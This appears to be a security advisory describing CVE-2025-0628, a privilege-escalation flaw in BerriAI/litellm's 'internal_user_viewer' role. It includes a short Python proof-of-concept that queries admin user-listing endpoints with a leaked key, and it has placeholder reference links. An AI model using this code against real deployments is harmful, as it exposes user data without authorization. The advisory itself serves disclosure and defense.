CVE-2025-0628 - Privilege Escalation Vulnerability in BerriAI/litellm due to Improper Authorization

A recently discovered vulnerability, CVE-2025-0628, within the main-latest version of BerriAI/litellm, a popular artificial intelligence and machine learning platform, has raised concerns about its security. The vulnerability originates from an improper authorization issue that affects users with the role of 'internal_user_viewer'. This role is meant to have limited access to the application’s functionalities, but due to the vulnerability, a user with this role can gain access to all the admin functionalities, including sensitive endpoints like '/users/list' and '/users/get_users', which can lead to unwanted privilege escalation.

Original References

The vulnerability was initially discovered and reported by the security research team at CyberXplore (Link to the original report). Additionally, the National Vulnerability Database (NVD) has documented this vulnerability with all related information (Link to NVD).

Exploit Details

The root cause of this vulnerability lies in the fact that the application mistakenly provides an overly privileged API key when a user with the 'internal_user_viewer' role logs into the application. This key should have only granted read-only access, but it unintentionally grants write access as well, leading to privilege escalation.

The exploit can be easily reproduced with the following Python code snipplet

import requests

# Replace '{API_KEY}' with the overly privileged API key assigned to the 'internal_user_viewer' role
api_key = '{API_KEY}'
headers = {'Authorization': 'Bearer {}'.format(api_key)}

# Accessing the '/users/list' endpoint, which should be restricted to PROXY_ADMIN users only
list_users_url = "https://example.com/litellm/api/users/list";
response = requests.get(list_users_url, headers=headers)
print(response.text)

# Accessing the '/users/get_users' endpoint, which should be restricted to PROXY_ADMIN users only
get_users_url = "https://example.com/litellm/api/users/get_users";
response = requests.get(get_users_url, headers=headers)
print(response.text)

By running this code, a user with the 'internal_user_viewer' role can access the '/users/list' and '/users/get_users' endpoints and potentially escalate their privileges to assume the PROXY_ADMIN role.

Mitigation

To address this vulnerability, the development team at BerriAI must ensure that proper authorization is implemented for each endpoint. This will prevent users with limited roles from gaining unauthorized access to critical admin functionalities. As a temporary measure, users are encouraged to remove the 'internal_user_viewer' role from non-admin users until an official patch or update becomes available.

Conclusion

The CVE-2025-0628 vulnerability in BerriAI/litellm exposes the platform to potential privilege escalation attacks, allowing a seemingly harmless user with the 'internal_user_viewer' role to access critical admin functionalities. As developers work to resolve the issue, users should be cautious of who is granted the 'internal_user_viewer' role and follow any recommended security guidelines. The appropriate use of roles and permissions is crucial in maintaining the security and integrity of any application.

Timeline

Published on: 03/20/2025 10:15:53 UTC